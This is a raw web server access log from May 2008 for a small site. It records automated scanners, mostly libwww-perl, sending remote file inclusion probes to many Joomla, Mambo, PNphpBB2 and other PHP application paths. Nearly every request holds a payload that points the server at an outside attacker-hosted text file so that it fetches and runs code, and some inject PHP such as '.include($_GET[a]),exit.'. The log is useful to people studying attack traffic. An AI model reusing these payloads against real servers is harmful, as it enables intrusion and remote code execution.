72.18.155.74 - - [28/May/2008:11:34:52 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.90.73.127 - - [28/May/2008:11:34:53 -0700] "GET /app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:11:34:56 -0700] "GET /logs/access_080303.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:11:34:57 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
208.116.45.210 - - [28/May/2008:11:34:58 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:34:59 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:11:35:11 -0700] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.drcts.co.kr/rgboard/data/notice/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:35:19 -0700] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:35:24 -0700] "GET /logs/access_071224.log/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:35:24 -0700] "GET /modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:35:24 -0700] "GET /logs/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:35:24 -0700] "GET /logs/access_080106.log/modifyform.html?code=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:35:24 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:35:24 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:35:25 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:35:25 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:35:25 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [28/May/2008:11:35:25 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:35:26 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:35:27 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:35:27 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:35:27 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:35:28 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:35:29 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:35:30 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:35:30 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:35:31 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:35:33 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [28/May/2008:11:35:35 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [28/May/2008:11:35:36 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [28/May/2008:11:35:37 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:35:38 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:35:39 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.217.194 - - [28/May/2008:11:35:49 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://tgr-clan.ch/tes? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
66.225.217.194 - - [28/May/2008:11:35:49 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://tgr-clan.ch/tes? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
217.114.163.198 - - [28/May/2008:11:36:01 -0700] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.fingerxs.eu/modules/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.114.163.198 - - [28/May/2008:11:36:01 -0700] "GET //components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.fingerxs.eu/modules/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.57.150.97 - - [28/May/2008:11:36:02 -0700] "GET /logs/access_071224.log//components/com_htmlarea3_xtd-c/popups/ImageManager/images.php?IMG_ROOT=http://www.fingerxs.eu/modules/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:36:22 -0700] "GET /logs/access.log/start.php?lang=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:36:22 -0700] "GET /start.php?lang=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:36:22 -0700] "GET /logs/start.php?lang=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:36:23 -0700] "GET /logs/access.log/start.php?lang=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:36:23 -0700] "GET /start.php?lang=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:36:24 -0700] "GET /logs/start.php?lang=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.19.38 - - [28/May/2008:11:36:32 -0700] "GET /bikes/CreSTOC07/?S=A HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.90.73.127 - - [28/May/2008:11:36:32 -0700] "GET /logs/access_080412.log/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.90.73.127 - - [28/May/2008:11:36:33 -0700] "GET /logs/app/webeditor/login.cgi?username=&command=simple&do=edit&password=&file=http://amsny.org/site/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:11:36:42 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.drcts.co.kr/rgboard/data/notice/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:11:36:42 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.drcts.co.kr/rgboard/data/notice/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:37:28 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:37:29 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.59 - - [28/May/2008:11:37:33 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [28/May/2008:11:37:34 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.59 - - [28/May/2008:11:37:34 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://h1.ripway.com/target/ndus/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:37:34 -0700] "GET /start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:11:37:37 -0700] "GET /logs/access_071225.log/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:11:37:37 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.drcts.co.kr/rgboard/data/notice/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:11:37:37 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.96.205 - - [28/May/2008:11:37:37 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.drcts.co.kr/rgboard/data/notice/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
211.115.213.77 - - [28/May/2008:11:37:37 -0700] "GET /logs/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:37:42 -0700] "GET /start.php?id=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:37:46 -0700] "GET /logs//components/com_smf/smf.php=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
195.2.228.10 - - [28/May/2008:11:37:48 -0700] "GET //components/com_smf/smf.php=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:37:53 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.26.122 - - [28/May/2008:11:37:55 -0700] "GET /logs/access_080309.log//admin/business_inc/saveserver.php?thisdir=http://www.english-irish-setter.at/webnews/.../id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:37:59 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:01 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:01 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:01 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:04 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:05 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:05 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:07 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:09 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.155.74 - - [28/May/2008:11:38:10 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:11 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:11 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:11 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:15 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:38:17 -0700] "GET /show.php?page=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.208.118.35 - - [28/May/2008:11:38:17 -0700] "GET /show.php?page=http://www.comsolve.nl/radio789/xuxuon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:18 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:19 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:20 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 200 4139 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [28/May/2008:11:38:20 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.67.220 - - [28/May/2008:11:38:26 -0700] "GET /logs/access_080327.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/ghamyezt/panace.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [28/May/2008:11:38:26 -0700] "GET /logs/access_080327.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/ghamyezt/panace.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [28/May/2008:11:38:29 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/ghamyezt/panace.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [28/May/2008:11:38:32 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/ghamyezt/panace.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [28/May/2008:11:38:34 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/ghamyezt/panace.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [28/May/2008:11:38:36 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/ghamyezt/panace.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [28/May/2008:11:38:37 -0700] "GET /logs/access_080327.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/ghamyezt/panace.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [28/May/2008:11:38:38 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/ghamyezt/panace.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.220 - - [28/May/2008:11:38:39 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://geocities.com/ghamyezt/panace.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:38:45 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:38:46 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [28/May/2008:11:38:47 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.ctocnet-socal.org/pages/back.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.84.106.68 - - [28/May/2008:11:38:50 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.190.24.146 - - [28/May/2008:11:38:59 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.muangthai.com/album/data9090/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [28/May/2008:11:39:13 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://tgr-clan.ch/tes? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
